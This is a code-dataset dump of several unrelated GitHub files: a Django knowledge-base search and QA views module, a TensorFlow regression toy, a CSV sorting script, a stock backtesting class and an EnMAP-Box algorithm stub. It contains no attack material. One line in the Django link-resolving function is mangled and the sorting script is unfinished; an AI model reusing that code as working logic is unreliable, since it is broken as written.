cursor.fetchone()[4]\n\ndef strip_content_links(content):\n return re.sub(r'\\{\\{([a-zA-Z_]+):([^|]+)\\|([^}]+)\\}\\}', lambda x:x.group(3), content)\n\ndef resolve_content_links(content, infoboxlinks=[]):\n # TODO: add cache\n content = escape(content)\n\n\n def strip_obvious_links(content):\n '''\n strip all links in a string, return the links list and the stripped string.\n e.g.:\n \"This is a {{link:/url.htm|test}}\"\n ==>\n [{'start':10, 'end': 14, 'link_type': 'link', 'link_to': 'url.htm'}], \"This is a test\"\n '''\n links = {}\n stripped_len = [0]\n def _strip(regx_match):\n value_len = len(regx_match.group(3))\n match_len = regx_match.end() - regx_match.start()\n this_stripped_len = match_len - value_len\n url_real = 'http://baike.baidu.com' + regx_match.group(2)\n linked_ne = NamedEntity.objects.filter(bdbk_url=url_real)\n if linked_ne:\n start = regx_match.start()-stripped_len[0]\n end = regx_match.end()-stripped_len[0]-this_stripped_len\n links[(start,end)] = reverse('ShowTuplesForNamedEntity', args=(linked_ne[0].pk,))\n\n stripped_len[0] += this_stripped_len\n return regx_match.group(3)\n\n return links, 
re.sub(r'\\{\\{([a-zA-Z_]+):([^|]+)\\|([^}]+)\\}\\}', _strip, content)\n\n links, content = strip_obvious_links(content)\n\n for i in infoboxlinks:\n mch = re.match(r'\\{\\{([a-zA-Z_]+):([^|]+)\\}\\}', i.linkcontent)\n if not mch: continue\n\n if mch.group(1) == 'alias_id':\n try:\n target = NamedEntityAlias.objects.get(pk=mch.group(2)).link_to\n except ObjectDoesNotExist as e:\n target = None\n elif mch.group(1) == 'ne_id':\n try:\n target = NamedEntity.objects.get(pk=mch.group(2))\n except ObjectDoesNotExist as e:\n target = None\n else:\n target = None\n\n if target and (i.start, i.end) not in links:\n links[(i.start, i.end)] = reverse('ShowTuplesForNamedEntity', args=(target.pk,))\n\n links_keys = sorted(links.keys())\n splits = [] # string builder\n start = 0 # current start pos of content[0]\n for s,e in links_keys:\n if s%s' % (links[(s,e)], part))\n splits.append(content)\n\n return ''.join(splits)\n\ndef populate_db_status():\n # current data status\n total_tuple_count = '~%d' % approx_count_objects(InfoboxTuple)\n # InfoboxTuple.objects.all().count()\n total_verb_count = '~%d' % approx_count_objects(Verb)\n # Verb.objects.all().count()\n total_ne_count = '~%d' % approx_count_objects(NamedEntity)\n # NamedEntity.objects.all().count()\n\n return {\n 'status':{\n 'ne_count': total_ne_count,\n 'infoboxtuple_count': total_tuple_count,\n 'verb_count': total_verb_count,\n 'db_version': DBVersion\n }\n }\n\ndef populate_random_suggestion():\n # fetch random named entities\n random_nes = []\n\n for randomed in random_objects(NamedEntity, 6):\n random_nes.append({\n 'ne_title': randomed.name,\n 'ne_url': reverse('ShowTuplesForNamedEntity', args=(randomed.pk,))\n })\n\n return {\n 'randomnes': random_nes\n }\n\nstopwords = None\ndef is_in_stopwords(word):\n global stopwords\n if stopwords is None:\n _stopwords = {}\n with open(os.path.dirname(__file__)+'/stopwords.txt') as f:\n for line in f:\n _stopwords[line.rstrip('\\n').decode('utf8')] = 1\n stopwords = _stopwords\n\n return word in stopwords\n\n# init stopwords cache\nis_in_stopwords('')\n\nsynonym = None\ndef get_synonyms(word):\n global synonym\n if synonym is None:\n _synonym = {}\n with open(os.path.dirname(__file__)+'/synonym.txt') as f:\n for line in f:\n f = line.rstrip('\\n').decode('utf8')\n if f[0] == '#': continue\n if len(f) <= 9: continue\n f = f[9:]\n words = [x.strip() for x in re.split(r'\\s+', f) if x.strip()]\n for word in words:\n _synonym[word] = [x for x in words if x!=word]\n synonym = _synonym\n\n return synonym.get(word, [])\n\n# init synonym cache\nget_synonyms('')\n\n# views starts\n\ndef About(request):\n return render(request, 'bdbk/About.html', {})\n\ndef Status_Overview(request):\n return render(request, 'bdbk/Status_Overview.html', populate_db_status())\n\ndef Status_Verb(request):\n return HttpResponse('TODO')\n\ndef Status_NamedEntity(request, filter_string=None):\n return HttpResponse('TODO')\n\ndef AdvancedSearch(request):\n def AdvancedSearch_get(request):\n context = {}\n context.update(populate_random_suggestion())\n context.update(populate_db_status())\n return render(request, 'bdbk/AdvancedSearch_form.html', context)\n\n def AdvancedSearch_post(request):\n ne_action = request.POST.get('limitNE_action')\n ne_str = request.POST.get('limitNE_str')\n\n verb_action = request.POST.get('limitVERB_action')\n verb_str = request.POST.get('limitVERB_str')\n\n content_action = request.POST.get('limitCONTENT_action')\n content_str = request.POST.get('limitCONTENT_str')\n\n def action_to_query_dict(field, 
field_friendly_name, action, qstr):\n if action == 'IS':\n a = 'iexact'\n b = '%s is \"%s\"' % (field_friendly_name, qstr)\n elif action == 'STARTSWITH':\n a = 'istartswith'\n b = '%s starts with \"%s\"' % (field_friendly_name, qstr)\n elif action == 'ENDSWITH':\n a = 'iendswith'\n b = '%s ends with \"%s\"' % (field_friendly_name, qstr)\n elif action == 'CONTAINS':\n a = 'icontains'\n b = '%s contains \"%s\"' % (field_friendly_name, qstr)\n else:\n a = 'icontains'\n b = '%s contains \"%s\"' % (field_friendly_name, qstr)\n\n return b, {\n field + '__' + a: qstr\n }\n\n qdict = []\n friendly_name = []\n if ne_str:\n friendly_name_1, qdict_1 = action_to_query_dict('named_entity__name', 'Name of entity', ne_action, ne_str)\n q = Q(**qdict_1)\n friendly_name.append(friendly_name_1)\n\n friendly_name_1, qdict_1 = action_to_query_dict('named_entity__search_term', 'Search term of entity', ne_action, ne_str)\n q |= Q(**qdict_1)\n friendly_name.append(friendly_name_1)\n\n friendly_name_alias, qdict_alias = action_to_query_dict('link_from', 'Name alias', ne_action, ne_str)\n friendly_name.append(friendly_name_alias)\n alias_result = NamedEntityAlias.objects.filter(**qdict_alias).all()\n if alias_result:\n q |= Q(named_entity__pk__in=[x.link_to.pk for x in alias_result])\n\n qdict.append(q)\n if verb_str:\n friendly_name_2, qdict_2 = action_to_query_dict('verb__name', 'verb', verb_action, verb_str)\n qdict.append(Q(**qdict_2))\n friendly_name.append(friendly_name_2)\n if content_str:\n friendly_name_3, qdict_3 = action_to_query_dict('content', 'attribute value', content_action, content_str)\n qdict.append(Q(**qdict_3))\n friendly_name.append(friendly_name_3)\n\n if not qdict:\n context = {\n 'search_result_message': 'No filter applied.'\n }\n else:\n # TODO: paginator\n qresult = InfoboxTuple.objects.filter(*qdict).order_by('named_entity', 'verb')\n\n result = []\n for i in qresult:\n result.append({\n 'namedentity': i.named_entity.name,\n 'namedentity_url': reverse('ShowTuplesForNamedEntity', args=(i.named_entity.id,)),\n 'verb': i.verb.name,\n 'content': resolve_content_links(i.content, list(i.infoboxtuplelink_set.all()))\n })\n\n context = {\n 'search_result': result,\n 'friendly_query_string': ', '.join(friendly_name),\n 'search_result_message': '%d results.' % len(result)\n }\n\n context.update(populate_db_status())\n return render(request, 'bdbk/AdvancedSearch_result.html', context)\n\n if request.method == 'POST':\n return AdvancedSearch_post(request)\n else:\n return AdvancedSearch_get(request)\n\n@require_http_methods(['POST'])\ndef FuzzySearch(request):\n '''\n Fuzzy query strategy:\n 1. Named Entity name:\n name,\n search_term\n 2. Content:\n 3. 
Verb\n '''\n\n search_term = request.POST.get('query', None)\n if not search_term:\n return HttpResponseRedirect(reverse('ShowTuplesForNamedEntity', args=('random',)))\n\n # ne_search_result = NamedEntity.objects.filter(name__startswith=search_term)\n ne_search_result = NamedEntity.objects.filter(name__icontains=search_term)\n\n search_result_ne = []\n for obj in ne_search_result:\n search_result_ne.append({\n 'ne_name': obj.name,\n 'ne_url': reverse('ShowTuplesForNamedEntity', args=(obj.pk,))\n })\n\n tuple_search_result = InfoboxTuple.objects.filter(content__icontains=search_term)\n\n search_result_content = []\n for obj in tuple_search_result:\n search_result_content.append({\n 'ne_name': obj.named_entity.name,\n 'ne_url': reverse('ShowTuplesForNamedEntity', args=(obj.named_entity.pk,)),\n 'verb': obj.verb.name,\n 'content': resolve_content_links(obj.content, list(obj.infoboxtuplelink_set.all())),\n })\n\n result = {\n 'search_term': search_term,\n 'search_result_ne': search_result_ne,\n 'search_result_content': search_result_content,\n }\n return render(request, 'bdbk/SearchResult.html', result)\n\ndef ShowTuplesForNamedEntity(request, nepk):\n if nepk == 'random':\n random_ne = list(random_objects(NamedEntity, 1))[0]\n nepk = random_ne.pk\n return HttpResponseRedirect(reverse('ShowTuplesForNamedEntity', args=(nepk,)))\n\n nepk = int(nepk)\n\n ne_object = get_object_or_404(NamedEntity, pk=nepk)\n\n tuples = []\n\n for infoboxtuple in ne_object.infoboxtuple_set.all():\n tuples.append({\n 'verb': infoboxtuple.verb.name,\n 'content': resolve_content_links(infoboxtuple.content, list(infoboxtuple.infoboxtuplelink_set.all())),\n })\n\n def getCatString(ne_object):\n cat_names = []\n for i in ne_object.categories.all():\n cat_names.append(i.name)\n\n return ','.join(cat_names)\n\n result = {\n 'nepk': nepk,\n 'namedentity':{\n 'ne_id': nepk,\n 'ne_title': ne_object.name,\n 'ne_search_term': ne_object.search_term,\n 'ne_last_modified': ne_object.last_modified.strftime('%Y-%m-%d %H:%M:%S') if ne_object.last_modified else 'Not Specified',\n 'ne_bdbk_url': ne_object.bdbk_url,\n 'ne_infobox': tuples,\n 'ne_cats': getCatString(ne_object),\n },\n }\n result.update(populate_random_suggestion())\n result.update(populate_db_status())\n\n return render(request, 'bdbk/ShowTuplesForNamedEntity.html', result)\n\ndef namedEntityLinks(request, nepk):\n '''\n return value:\n {\n \"name\": \"name of ne\",\n\n \"tuples\": [{\n \"id\": 0,\n \"verb\": \"some verb\",\n \"value\": \"some value\",\n }, ...],\n\n \"links\": [{\n \"id\": 0,\n \"name\": \"some link name\",\n \"nepk\": some pk\n \"tuple\": 0\n }]\n }\n '''\n ne_object = get_object_or_404(NamedEntity, pk=nepk)\n result = {}\n result['name'] = ne_object.name\n\n nodes = {}\n links = []\n def linkedNEOfNE(obj, obj_group):\n if obj.pk not in nodes:\n nodes[obj.pk] = {\n \"name\": obj.name,\n \"nepk\": obj.pk,\n \"group\": obj_group,\n \"ne_obj\": obj\n }\n for tuple in obj.infoboxtuple_set.all():\n def handle_links(match):\n schema = match.group(1)\n link = match.group(2)\n if schema == 'link':\n real_url = 'http://baike.baidu.com' + link\n\n # we are currently unable to resolve duplicate bdbk_urls, so...\n ne = NamedEntity.objects.exclude(pk=obj.pk).filter(bdbk_url=real_url)\n if len(ne) > 0:\n ne = ne[0]\n if ne.pk not in nodes:\n nodes[ne.pk] = {\n \"name\": ne.name,\n \"nepk\": ne.pk,\n \"group\": obj_group+1,\n \"ne_obj\": ne\n }\n\n links.append({\n \"source\": obj.pk,\n \"target\": ne.pk\n })\n else:\n pass\n\n return match.group(3)\n\n 
re.sub(r'\\{\\{([a-zA-Z_]+):([^|]+)\\|(.*?)\\}\\}', handle_links, tuple.content)\n\n for link in tuple.infoboxtuplelink_set.all():\n match = re.match(r'\\{\\{([a-zA-Z_]+):(\\d+)\\}\\}', link.linkcontent)\n if not match:\n continue\n\n schema = match.group(1)\n mid = match.group(2)\n ne_obj = None\n\n if schema == 'alias_id':\n try:\n alias = NamedEntityAlias.objects.get(pk=mid)\n ne_obj = alias.link_to\n except ObjectDoesNotExist as e:\n pass\n elif schema == 'ne_id':\n try:\n ne_obj = NamedEntity.objects.get(pk=mid)\n except ObjectDoesNotExist as e:\n pass\n\n if ne_obj:\n if ne_obj.pk not in nodes:\n nodes[ne_obj.pk] = {\n \"name\": ne_obj.name,\n \"nepk\": ne_obj.pk,\n \"group\": obj_group+1,\n \"ne_obj\": ne_obj\n }\n links.append({\n \"source\": obj.pk,\n \"target\": ne_obj.pk,\n })\n\n\n linkedNEOfNE(ne_object, 5)\n for i in nodes.values():\n if i['ne_obj'].pk != ne_object.pk:\n linkedNEOfNE(i['ne_obj'], 6)\n\n # relink all nodes\n new_nodes = []\n new_links = []\n new_neid_nodeid_map = {}\n\n def addNode(pk):\n if pk not in new_neid_nodeid_map:\n node = nodes[pk]\n new_nodes.append({\n 'name': node['name'],\n 'ne_pk': node['nepk'],\n 'group': node['group'],\n })\n new_neid_nodeid_map[pk] = len(new_nodes) - 1\n return new_neid_nodeid_map[pk]\n\n addNode(ne_object.pk)\n\n for link in links:\n source = addNode(link['source'])\n target = addNode(link['target'])\n new_links.append({\n 'source': source,\n 'target': target\n })\n result['nodes'] = new_nodes\n result['links'] = new_links\n\n return HttpResponse(json.dumps(result), content_type='text/json')\n\ndef qaQueryAPI(request):\n text = request.POST.get('text', None)\n\n if text is None:\n return HttpResponseBadRequest()\n\n words = list(jieba.cut(text, cut_all=False))\n\n ne_result = []\n\n def search_ne():\n for i in range(len(words)):\n for j in range(i+1, len(words)+1):\n s = ''.join(words[i:j])\n if is_in_stopwords(s):\n continue\n\n for o in NamedEntity.objects.filter(name__iexact=s):\n ne_result.append({\n 'pos': (i,j),\n 'type': 'ne',\n 'display': o.name,\n 'o': o\n })\n for o in NamedEntity.objects.filter(~Q(name__iexact=s),\n Q(search_term__iexact=s)):\n ne_result.append({\n 'pos': (i,j),\n 'type': 'ne_search_term',\n 'display': o.search_term,\n 'o': o\n })\n for o in NamedEntityAlias.objects.filter(link_from__iexact=s):\n ne_result.append({\n 'pos': (i,j),\n 'type': 'alias',\n 'display': o.link_from,\n 'o': o\n })\n\n verb_result = []\n def search_verb():\n for i in range(len(words)):\n for j in range(i+1, len(words)+1):\n s = ''.join(words[i:j])\n try:\n o = Verb.objects.get(name__iexact=s)\n verb_result.append({\n 'pos': (i,j),\n 'display': o.name,\n 'o': o\n })\n except ObjectDoesNotExist as e:\n pass\n\n search_ne()\n search_verb()\n\n result = {\n 'tokenize': words,\n 'result': []\n }\n\n named_entities = []\n for i in ne_result:\n if i['type'] == 'alias':\n if i['o'].link_to.infoboxtuple_set.count() > 0:\n named_entities.append({\n 'ne_title': i['o'].link_to.name,\n 'ne_display': i['display'],\n 'is_alias': True,\n 'ne_id': i['o'].link_to.pk\n })\n else:\n if i['o'].infoboxtuple_set.count() > 0:\n named_entities.append({\n 'ne_title': i['o'].name,\n 'ne_display': i['display'],\n 'ne_id': i['o'].pk,\n 'is_alias': False\n })\n result['named_entities'] = sorted(named_entities,\n key=lambda x:len(x['ne_display']),\n reverse=True)\n\n for i in ne_result:\n for j in verb_result:\n if i['pos'][1] > j['pos'][0]:\n continue\n\n ne_obj = i['o'] if i['type'] != 'alias' else i['o'].link_to\n verb_obj = j['o']\n\n infobox = 
InfoboxTuple.objects.filter(named_entity=ne_obj.pk,\n verb=verb_obj.pk)\n if len(infobox):\n result['result'].append({\n 'ne_title': ne_obj.name,\n 'ne_display': i['display'],\n 'is_alias': i['type'] == 'alias',\n 'verb': verb_obj.name,\n 'ne_id': ne_obj.pk,\n 'content': resolve_content_links(infobox[0].content)\n })\n\n if not result['result']:\n def edit_distance(s1, s2):\n m=len(s1)+1\n n=len(s2)+1\n\n tbl = {}\n for i in range(m): tbl[i,0]=i\n for j in range(n): tbl[0,j]=j\n for i in range(1, m):\n for j in range(1, n):\n cost = 0 if s1[i-1] == s2[j-1] else 1\n tbl[i,j] = min(tbl[i, j-1]+1, tbl[i-1, j]+1, tbl[i-1, j-1]+cost)\n\n return tbl[i,j]\n\n # find infobox by applying edit distance\n for i in ne_result:\n remaining = ''.join(words[i['pos'][1]:])\n ne_obj = i['o'] if i['type'] != 'alias' else i['o'].link_to\n matched = []\n for j in ne_obj.infoboxtuple_set.all():\n verb = j.verb.name\n\n # synonyms\n should_continue = False\n for word in get_synonyms(verb):\n if word in remaining:\n matched.append((len(word), j))\n should_continue = True\n if should_continue: continue\n\n common_chr = set(remaining) & set(verb)\n if not common_chr:\n continue\n\n matched.append((len(common_chr), j))\n\n matched = sorted(matched, key=lambda x:x[0], reverse=True)\n if matched:\n result['result'].append({\n 'ne_title': ne_obj.name,\n 'ne_display': i['display'],\n 'is_alias': i['type'] == 'alias',\n 'verb': matched[0][1].verb.name,\n 'ne_id': ne_obj.pk,\n 'content': resolve_content_links(matched[0][1].content)\n })\n\n result['result'] = sorted(result['result'],\n key=lambda x:len(x['ne_display']),\n reverse=True)\n\n return HttpResponse(json.dumps(result), content_type='text/json')\n\ndef QA(request):\n return render(request, 'bdbk/QA.html', {})\n","repo_name":"NLPScott/bdbk-kb","sub_path":"project/bdbk/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":23122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37608089759","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\n\nx = tf.constant([[1],[2],[3],[4]], dtype = tf.float32)\nyTrue = tf.constant([[0],[-2],[-1],[-3]] , dtype =tf.float32)\n\nlinearModel = tf.layers.Dense(units= 1)\n\nyPred = linearModel(x)\n\nsess = tf.Session()\ninit = tf.global_variables_initializer()\nsess.run(init)\n\nprint(sess.run(yPred))\n\nloss = tf.losses.mean_squared_error(labels = yTrue , predictions = yPred)\n\nprint(sess.run(loss))\n\noprimizer = tf.train.GradientDescentOptimizer(0.01)\ntrain = oprimizer.minimize(loss)\n\nfor i in range(100):\n\t_,lossValue = sess.run((train,loss))\n\tprint(lossValue)","repo_name":"kasunvj/Tensorflow_core_gym-","sub_path":"TFcore2.py","file_name":"TFcore2.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70212869925","text":"import sys\r\n\r\n\r\ndef main():\r\n N = int(input())\r\n count = [0, 1, 1]\r\n while len(count) - 1 < N:\r\n count.append(count[-2] + count[-1])\r\n print(count[N])\r\n\r\n\r\nif __name__ == '__main__':\r\n input = sys.stdin.readline\r\n main()\r\n","repo_name":"SeungWoo-You/PS","sub_path":"백준/Silver/2193. 
이친수/이친수.py","file_name":"이친수.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27057465727","text":"import csv\nfrom itertools import islice\nfrom operator import itemgetter\nimport pprint\n\nNew = {}\n\n\ndef select_sorted(sort_columns='high', order='asc', limit=10, filename='dump.csv', group_by_name=False):\n high_lst = []\n with open('all_stocks_5yr.csv', 'r', encoding='utf8') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=',')\n group_by_name = []\n for row in reader:## Sozdali spisok is 10 elementov\n if len(high_lst) < limit:\n high_lst.append(row[sort_columns])\n group_by_name.append(row['Name'])\n else:\n break\n high_lst = [float(x) for x in high_lst]## pereveli iz str fo float\n group_by_name.sort()##Tut ispolsuu sort nechestno\n\n if not group_by_name:###Zdes ya ne ponimau kak rabotaet True False i chto nado sdelat\n with open('output.csv', \"w\") as f:\n writer = csv.writer(f)\n writer.writerow(group_by_name)\n else:\n\n for i in range(len(high_lst) - 1): ##Sortiruem puzrkom\n index_1 = 0\n for j in range(len(high_lst) - index_1 - 1):\n if high_lst[index_1] > high_lst[index_1 + 1]:\n high_lst[index_1], high_lst[index_1 + 1] = high_lst[index_1 + 1], high_lst[index_1]\n index_1 += 1\n elif high_lst[index_1] < high_lst[index_1 + 1]:\n index_1 += 1\n\n # with open('output.csv', \"w\") as f:\n # writer = csv.writer(f)\n # writer.writerow(group_by_name)\n\n if order == 'asc': ##Zanosim v cvs file po vozrastaniu\n with open('output.csv', \"w\") as f:\n writer = csv.writer(f)\n writer.writerow(high_lst)\n\n else:## ##Zanosim v cvs file po ubivaniu\n high_lst_revers = reversed(high_lst)\n with open('output.csv', \"w\") as f:\n writer = csv.writer(f)\n writer.writerow(list(high_lst_revers))\n\n\n get_columns = itemgetter('date','open','high','low','close','volume','Name')\n Cache = {}\n\n with open('all_stocks_5yr.csv') as csvfile:\n reader = csv.DictReader(csvfile)\n index_1 = 0\n high_lst = [str(x) for x in high_lst]\n for row in islice(reader, limit): # first 10 put into Cache\n Cache[high_lst[index_1]] = get_columns(row)##V kachestve kluchei znachenia high iz high_lst\n index_1 += 1\n print(Cache, end='\\n')\n # return Cache, print(high_lst)\n # new = {}\n\n ## Obrashaemsya k elementu kortezha v slovare Cache: Cache[index_1]['high'] esli sovpal, to kortezh celicom stavim na 1 mesto\n new = {}\n index_1 = 0\n index_2 = 0\n for k in Cache:\n for v in Cache:\n if k == Cache[v][2]:\n new.update({k: Cache[v]})\n index_1 += 1\n elif k != Cache[v][2]:\n index_1 += 1\n index_2 += 1\n # print(new)\n pprint.pprint(new, width=100)\n\n\nselect_sorted(sort_columns='high', limit=10, order='desc', filename='dump.csv', group_by_name=True)\n\n# Cache, high_lst =\n# def f(Cache):\n#\n# print(Cache)\n#\n#\n# f(Cache)\n\n# def cache_new(func):\n# def wrapper(*args):\n# global New\n# if args[0] in New:\n# return New[0]\n# value = func(*args)\n# New[args[0]] = value\n# return value\n# return wrapper\n#\n#\n# @cache_new","repo_name":"Andreymazo/select_sorted","sub_path":"sorted.py","file_name":"sorted.py","file_ext":"py","file_size_in_byte":3584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20166221215","text":"import pandas as pd\nimport numpy as np\nimport datetime as dt\nfrom typing import Iterable, Tuple\n\n\nclass Backtesting:\n def __init__(\n self,\n initial_cash_balance: int,\n end_date: dt,\n compiled_df: pd.DataFrame,\n 
ten_yr_yield: pd.Series,\n stock_to_beta_df: pd.DataFrame,\n index_prices: pd.Series\n ):\n self.cash_balance = initial_cash_balance\n self.end_date = end_date\n self.bom_balance = initial_cash_balance\n self.ten_yr_yield = ten_yr_yield\n self.compiled_df = compiled_df\n self.stock_to_beta_df = stock_to_beta_df\n self.index_prices= index_prices\n self.is_sufficient_balance = True\n self.owned_stocks = []\n self.transaction_id = 1\n self.ticker_to_num_shares_monthly = dict()\n self.ticker_to_purchase_date = dict()\n self.ticker_to_purchase_price = dict()\n self.reached_holding_period_limit = []\n\n def get_closing_price(self, tr_date: dt, ticker: str) -> float:\n df = self.compiled_df.set_index(\"date\")\n return df.loc[tr_date][f\"closing_price_{ticker}\"]\n\n def get_rsi(self, tr_date: dt, ticker: str) -> float:\n df = self.compiled_df.set_index(\"date\")\n return df.loc[tr_date][f\"rsi_{ticker}\"]\n\n def order_tickers_to_buy(self, tickers_to_buy: Iterable, tr_date: dt, order_by: str = None) -> Iterable:\n if order_by is None:\n return tickers_to_buy\n else:\n ticker_to_ordered_attribute = {\"ticker\": [], order_by: []}\n for ticker in tickers_to_buy:\n ticker_to_ordered_attribute[\"ticker\"] += [ticker]\n ticker_to_ordered_attribute[order_by] += [getattr(self, f\"get_{order_by}\")(tr_date, ticker)]\n\n ticker_to_ordered_attribute = pd.DataFrame(ticker_to_ordered_attribute).sort_values(by=order_by, ascending=False)\n\n return list(ticker_to_ordered_attribute[\"ticker\"])\n\n def initialise_output_dfs(self, is_buy_df: pd.DataFrame) -> Tuple[pd.DataFrame, pd.DataFrame]:\n start_date = is_buy_df[\"date\"][0]\n\n transactions_df = pd.DataFrame(\n {\n \"transaction_id\": 0,\n \"date\": start_date,\n \"stock\": None,\n \"action\": 0,\n \"price\": 0,\n \"num_shares\": 0,\n \"cash_balance\": self.cash_balance\n },\n index=[0]\n )\n\n capm_df = pd.DataFrame(\n {\n \"sell_transaction_id\": 0,\n \"stock\": None,\n \"buy_date\": None,\n \"buy_price\": 0,\n \"sell_date\": None,\n \"sell_price\": 0,\n \"r_m\": 0,\n \"r_f\": 0,\n \"E_r\": 0,\n \"R_i\": 0,\n \"risk_adjusted_ri\": 0,\n \"reached_holding_period_limit\": False\n },\n index=[0]\n )\n\n return transactions_df, capm_df\n\n def get_tickers_to_buy(self, is_buy: pd.Series) -> Iterable:\n tickers_to_buy = set(s[7:] for s in is_buy[is_buy == True].index)\n tickers_to_buy = tickers_to_buy.difference(self.owned_stocks)\n\n return tickers_to_buy\n\n def get_tickers_to_sell(self, is_sell: pd.Series, tr_date: dt, max_days_held: int = None) -> Iterable:\n tickers_to_sell = set(s[8:] for s in is_sell[is_sell == True].index)\n tickers_to_sell = list(tickers_to_sell.intersection(self.owned_stocks))\n\n if max_days_held is not None:\n for ticker in self.owned_stocks:\n if ticker not in tickers_to_sell:\n days_held = (tr_date - self.ticker_to_purchase_date[ticker]).days\n if days_held > max_days_held:\n tickers_to_sell += [ticker]\n self.reached_holding_period_limit += [ticker]\n\n return tickers_to_sell\n \n def implement_trading_strategy(\n self, is_buy_df: pd.DataFrame, is_sell_df: pd.DataFrame, order_buy_trades_by: str, max_days_held: int = None\n ) -> Tuple[pd.DataFrame, pd.DataFrame]:\n\n transactions_df, capm_df = self.initialise_output_dfs(is_buy_df)\n\n for row in range(len(is_buy_df)):\n is_buy = is_buy_df.iloc[row]\n is_sell = is_sell_df.iloc[row]\n tr_date = is_buy[\"date\"]\n is_eom = self.compiled_df.set_index(\"date\").loc[tr_date][\"is_eom\"]\n investment_amount = np.round(self.bom_balance / 20, 2)\n\n if tr_date.date() == self.end_date:\n 
tickers_to_buy = []\n tickers_to_sell = self.owned_stocks.copy()\n else:\n tickers_to_buy = self.get_tickers_to_buy(is_buy)\n tickers_to_buy = self.order_tickers_to_buy(tickers_to_buy, tr_date, order_buy_trades_by)\n tickers_to_sell = self.get_tickers_to_sell(is_sell, tr_date, max_days_held)\n\n sell_index = 0\n while (len(tickers_to_sell) > 0) and (sell_index < len(tickers_to_sell)):\n ticker = tickers_to_sell[sell_index]\n buy_date = self.ticker_to_purchase_date[ticker]\n buy_price = self.ticker_to_purchase_price[ticker]\n days_held = (tr_date - buy_date).days\n action = -1\n price = self.get_closing_price(tr_date, ticker)\n num_shares = self.ticker_to_num_shares_monthly[ticker]\n self.cash_balance += num_shares * price\n transactions_df.loc[self.transaction_id, :] = [self.transaction_id, tr_date, ticker, action, price, num_shares, self.cash_balance]\n\n beta = self.stock_to_beta_df.loc[ticker][\"beta\"]\n rm = np.log(self.index_prices.loc[tr_date] / self.index_prices.loc[buy_date])\n rf = self.ten_yr_yield.loc[buy_date: tr_date].mean() / (365) * days_held\n er = rf + beta * (rm - rf)\n ri = np.log(price / buy_price)\n risk_adjusted_ri = ri - er\n if ticker in self.reached_holding_period_limit:\n bool_reached_hpl = True\n else:\n bool_reached_hpl = False\n\n capm_df.loc[self.transaction_id, :] = np.array(\n [self.transaction_id, ticker, buy_date.date(), buy_price, tr_date.date(), price, rm, rf, er, ri, risk_adjusted_ri, bool_reached_hpl],\n dtype=object)\n\n self.ticker_to_num_shares_monthly[ticker] = 0\n self.owned_stocks.remove(ticker)\n self.transaction_id += 1\n\n sell_index += 1\n\n if self.cash_balance > investment_amount:\n self.is_sufficient_balance = True\n\n buy_index = 0\n while (len(tickers_to_buy) > 0) and self.is_sufficient_balance and buy_index < len(tickers_to_buy):\n ticker = tickers_to_buy[buy_index]\n if self.cash_balance < investment_amount:\n self.is_sufficient_balance = False\n else:\n action = 1\n self.cash_balance -= investment_amount\n price = self.get_closing_price(tr_date, ticker)\n num_shares = np.round(investment_amount / price, 2)\n transactions_df.loc[self.transaction_id, :] = [self.transaction_id, tr_date, ticker, action, price, num_shares, self.cash_balance]\n self.ticker_to_num_shares_monthly[ticker] = num_shares\n self.ticker_to_purchase_date[ticker] = tr_date\n self.ticker_to_purchase_price[ticker] = price\n self.owned_stocks += [ticker]\n buy_index += 1\n self.transaction_id += 1\n\n if is_eom:\n self.bom_balance = self.cash_balance\n\n if self.bom_balance <= 0:\n break\n\n return transactions_df.set_index(\"transaction_id\"), capm_df.set_index(\"sell_transaction_id\")\n","repo_name":"musubr/stock-price-forecasts","sub_path":"src/backtesting.py","file_name":"backtesting.py","file_ext":"py","file_size_in_byte":8053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37880379536","text":"from typing import Dict, Any, List, Tuple, Union\r\n\r\nimport numpy as np\r\n\r\nfrom enmapboxprocessing.enmapalgorithm import EnMAPProcessingAlgorithm, Group\r\nfrom enmapboxprocessing.typing import ClassifierDump\r\nfrom enmapboxprocessing.utils import Utils\r\nfrom qgis.core import (QgsProcessingContext, QgsProcessingFeedback, QgsProcessingException)\r\nfrom enmapbox.typeguard import typechecked\r\n\r\n\r\n@typechecked\r\nclass RandomSamplesFromClassificationDatasetAlgorithm(EnMAPProcessingAlgorithm):\r\n P_DATASET, _DATASET = 'dataset', 'Classification dataset'\r\n P_N, _N = 'n', 'Number of samples per 
category'\r\n P_REPLACE, _REPLACE = 'replace', 'Draw with replacement'\r\n P_PROPORTIONAL, _PROPORTIONAL = 'proportional', 'Draw proportional'\r\n P_SEED, _SEED = 'seed', 'Random seed'\r\n P_OUTPUT_DATASET, _OUTPUT_DATASET = 'outputDatasetRandomSample', 'Output dataset'\r\n P_OUTPUT_COMPLEMENT, _OUTPUT_COMPLEMENT = 'outputDatasetRandomSampleComplement', 'Output dataset complement'\r\n\r\n def displayName(self) -> str:\r\n return 'Random samples from classification dataset'\r\n\r\n def shortDescription(self) -> str:\r\n return 'Split a dataset by randomly drawing samples.'\r\n\r\n def helpParameters(self) -> List[Tuple[str, str]]:\r\n return [\r\n (self._DATASET, 'Classification dataset pickle file with feature data X and target data y to draw from.'),\r\n (self._N,\r\n 'Number of samples to draw from each category. '\r\n 'Set a single value N to draw N samples for each category. '\r\n 'Set a list of values N1, N2, ... Ni, ... to draw Ni samples for category i.'),\r\n (self._REPLACE, 'Whether to draw samples with replacement.'),\r\n (self._PROPORTIONAL,\r\n 'Whether to interprete number of samples N or Ni as percentage to be drawn from each category.'),\r\n (self._SEED, 'The seed for the random generator can be provided.'),\r\n (self._OUTPUT_DATASET, self.PickleFileDestination + 'Stores sampled data.'),\r\n (self._OUTPUT_COMPLEMENT, self.PickleFileDestination + 'Stores remaining data that was not sampled.')\r\n ]\r\n\r\n def group(self):\r\n return 